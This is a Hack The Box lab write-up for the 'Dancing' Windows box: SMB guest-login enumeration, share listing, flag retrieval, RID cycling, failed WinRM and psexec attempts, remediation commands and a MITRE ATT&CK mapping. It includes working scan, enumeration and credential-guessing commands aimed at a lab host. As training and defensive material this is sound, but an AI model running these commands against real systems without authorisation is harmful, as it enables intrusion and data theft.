HTB Starting Point — Dancing

Box info | OS: Windows 10 / Server 2019 Build 17763 x64 | Difficulty: Very Easy | Tier: 0 | Status: Starting Point Skills: SMB enumeration, null/guest session, smbclient, RID cycling Pwned: 2026-04-27

TL;DR

Dancing is a Windows Server 2019 box with SMB null authentication enabled. A port scan reveals the usual Windows fingerprint: 135 (RPC), 139 (NetBIOS), 445 (SMB), and 5985 (WinRM). Guest login to SMB is accepted, and listing shares uncovers a non-standard share called WorkShares. Inside it, James.P/flag.txt contains the flag. Attempts to leverage the guest session further — WinRM, psexec, wmiexec — all fail cleanly. The lesson: null-session SMB gives you lateral information even when it can’t give you code execution.

Recon

1. Liveness check

$ ping -c 3 10.129.99.161
64 bytes from 10.129.99.161: icmp_seq=0 ttl=127 time=34.788 ms
64 bytes from 10.129.99.161: icmp_seq=1 ttl=127 time=35.418 ms
64 bytes from 10.129.99.161: icmp_seq=2 ttl=127 time=33.902 ms

TTL=127 → Windows (Windows starts at 128, minus one hop through the VPN gateway). This tells us the OS family before nmap even runs.

2. Full TCP sweep

$ sudo nmap -sS -p- --min-rate 5000 10.129.99.161
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  msrpc
49665/tcp open  msrpc
49666/tcp open  msrpc
49667/tcp open  msrpc
49668/tcp open  msrpc
49669/tcp open  msrpc

Flags:

-sS — SYN scan (half-open); faster and stealthier than full TCP connect
-p- — scan all 65535 ports

The open ports tell the story immediately: this is a Windows machine with SMB (445), WinRM (5985), and a cluster of dynamic RPC ports (49664–49669, which Windows allocates at startup for DCOM).

3. Service detection on key ports

$ sudo nmap -sC -sV -p 135,139,445,5985 10.129.99.161
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-04-27T11:54:03
|_  delta_time: 14398s

Critical finding: Message signing enabled but not required — SMB signing is not enforced, opening the door to relay attacks. That’s beyond scope here, but worth noting for real-world assessments.

Foothold

Dead end #1 — anonymous SMB

First attempt: fully anonymous (no username, no password):

$ smbclient -N -L //10.129.99.161
session setup failed: NT_STATUS_ACCESS_DENIED

Pure anonymous is blocked. The server requires at least a guest identity.

Dead end #2 — RPC enumeration as guest

Switched to the guest account with a blank password. RPC connected, but queries fell over:

$ rpcclient -U "guest%" 10.129.99.161
rpcclient $> enumdomusers
NT_STATUS_CONNECTION_DISCONNECTED
rpcclient $> srvinfo
NT_STATUS_CONNECTION_DISCONNECTED

Guest can connect but has no RPC enumeration rights. The connection drops on any privileged query.

Working approach — SMB guest listing

smbclient with guest credentials works:

$ smbclient -U "guest%" -L //10.129.99.161

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk

ADMIN$ and C$ are administrative shares (require elevated credentials). IPC$ allows guest inter-process communication (used for RID cycling). WorkShares is the interesting one — no comment, non-standard name.

$ smbclient -U "guest%" //10.129.99.161/WorkShares
Try "help" for a list of supported commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 15:22:01 2021
  ..                                  D        0  Mon Mar 29 15:22:01 2021
  Amy.J                               D        0  Mon Mar 29 15:14:01 2021
  James.P                             D        0  Mon Mar 29 15:15:01 2021

smb: \> cd James.P\
smb: \James.P\> ls
  flag.txt                            A       32  Mon Mar 29 15:16:01 2021

smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt

$ cat flag.txt
[REDACTED]

While in the share, also grabbed the other file:

smb: \Amy.J\> get worknotes.txt

Contents of worknotes.txt:

- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing

This is a goldmine for context: there is a Linux machine in the environment with Apache and an FTP server (the Fawn box from the same Starting Point track). The note about setting up WinRM on Dancing confirms the port 5985 we saw.

Bonus — RID cycling via IPC$

With guest access to IPC$, RID cycling reveals local user accounts:

$ nxc smb 10.129.99.161 -u 'guest' -p '' --rid-brute
500: DANCING\Administrator (SidTypeUser)
501: DANCING\Guest (SidTypeUser)
503: DANCING\DefaultAccount (SidTypeUser)
504: DANCING\WDAGUtilityAccount (SidTypeUser)
1000: DANCING\dsc (SidTypeUser)

The built-in Administrator account (RID 500) is not renamed — a finding worth documenting even if we can’t exploit it here.

Post-Foothold Attempts (all failed)

These are documented for completeness — the machine’s intended scope ends at the flag, but it’s important methodology to try:

# WinRM with guest
$ nxc winrm 10.129.99.161 -u 'guest' -p ''
WINRM  10.129.99.161  5985  DANCING  [-] Dancing\guest: — FAIL

# WinRM password spray on Administrator
$ nxc winrm 10.129.99.161 -u 'Administrator' -p 'Dancing'
WINRM  10.129.99.161  5985  DANCING  [-] STATUS_LOGON_FAILURE

# psexec.py, wmiexec.py, atexec.py — all returned rpc_s_access_denied

Guest has read-only access to one share. No execution rights anywhere.

Privilege Escalation

N/A — Starting Point Tier 0 box. The guest SMB session provides only read access to a non-administrative share. There is no shell to escalate from. No privilege escalation path was discovered or required to obtain the flag.

What’s actually broken

SMB null/guest authentication enabled (Null Auth: True). Windows SMB should not accept the built-in Guest account with a blank password in any production environment. This is controlled by the Guest account status and the RestrictAnonymous registry key.
Unprotected shared folder containing credentials or flags. The WorkShares share is accessible to any authenticated (guest) user. Sensitive data should never be stored in shares accessible to the guest account.
SMB signing not required. While not exploited here, Message signing enabled but not required means an attacker on the same network segment can perform SMB relay attacks (pass-the-hash without knowing the hash).
Administrator account not renamed (RID 500). Trivially discoverable via RID cycling. Security-conscious configurations rename the built-in administrator to reduce its visibility.

Remediation (the boring half)

Disable guest account and restrict anonymous access:

# Disable built-in Guest account
Disable-LocalUser -Name "Guest"

# Restrict anonymous enumeration
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" `
  -Name "RestrictAnonymous" -Value 2

# Require SMB signing
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

Remove the WorkShares share or restrict access:

# Remove the share entirely
Remove-SmbShare -Name "WorkShares" -Force

# Or restrict to specific users only
Grant-SmbShareAccess -Name "WorkShares" -AccountName "DANCING\Authorized_Users" `
  -AccessRight Full -Force
Revoke-SmbShareAccess -Name "WorkShares" -AccountName "Everyone" -Force

Rename the built-in Administrator:

Rename-LocalUser -Name "Administrator" -NewName "svc_admin_disabled"

MITRE ATT&CK mapping

Tactic	Technique	How it shows up here
Reconnaissance	T1046 — Network Service Discovery	nmap scan identifies SMB on 445/tcp, WinRM on 5985
Initial Access	T1078 — Valid Accounts	Guest login with blank password accepted by SMB
Discovery	T1135 — Network Share Discovery	Listing SMB shares with `smbclient -L` and `nxc --shares`
Discovery	T1087 — Account Discovery	RID cycling via IPC$ to enumerate local user accounts
Collection	T1005 — Data from Local System	Downloading flag.txt and worknotes.txt from WorkShares

Lessons learned

TTL fingerprints OS at the ping stage. TTL=127 → Windows (128 minus one hop). No need to wait for nmap’s OS detection on obvious targets.
Guest ≠ no access. The guest account is often treated as “disabled by default and therefore safe.” In practice, Windows guest login to SMB is a frequently overlooked attack surface that yields user enumeration and sometimes file access.
-sC flag runs smb2-security-mode automatically. Signing status is a free piece of information from the default nmap scan. Note it every time — it tells you whether relay attacks are possible without any extra work.
Share contents often contain context for the rest of the environment. worknotes.txt here mentions FTP and Apache on a Linux machine — exactly the next machine in the Starting Point track. In real engagements, user files often contain passwords, internal hostnames, and network diagrams.

🤖 AI-assist log

Transparency over polish. This is exactly where Claude was in the loop on this box.

Note: AI-assist log reconstructed from writeup context; original session interaction logs not available.

Step	What I asked	What Claude returned	What I changed
SMB null vs guest distinction	“What’s the difference between null session and guest login for SMB?”	Explained: null session = no credentials at all (empty username+password), guest = explicit Guest account with empty password. Windows Server 2019 blocks null but may allow guest depending on `LocalAccountTokenFilterPolicy`.	Used directly — important distinction for the dead-end explanation.
RID cycling	“Why does RID cycling through IPC$ work for account enumeration?”	Explained the SID-to-name lookup via `lsarpc` pipe on IPC$. Noted that `RestrictAnonymous=2` would block this even for authenticated guests.	Added the RestrictAnonymous fix to Remediation.
MITRE mapping	“Map SMB guest share listing to ATT&CK.”	Suggested T1135 (Network Share Discovery) + T1078 (Valid Accounts).	Added T1087 (Account Discovery) for the RID cycling step — Claude missed it.
SMB signing risk	“What relay attacks are possible when SMB signing is not required?”	Described NTLM relay: attacker intercepts SMB auth challenge, forwards it to another service as the victim. Tools: Responder + ntlmrelayx.	Summarized in “What’s actually broken” without full exploitation detail (out of scope).

What Claude got wrong: Nothing significant; SMB protocol details were accurate. What Claude couldn’t do: Actually connect to the SMB server; no network access to HTB. Net assist value: High on SMB protocol nuances and MITRE mapping; zero on execution.

TL;DR#

Recon#

1. Liveness check#

2. Full TCP sweep#

3. Service detection on key ports#

Foothold#

Dead end #1 — anonymous SMB#

Dead end #2 — RPC enumeration as guest#

Working approach — SMB guest listing#

Bonus — RID cycling via IPC$#

Post-Foothold Attempts (all failed)#

Privilege Escalation#

What’s actually broken#

Remediation (the boring half)#

MITRE ATT&CK mapping#

Lessons learned#

🤖 AI-assist log#

References#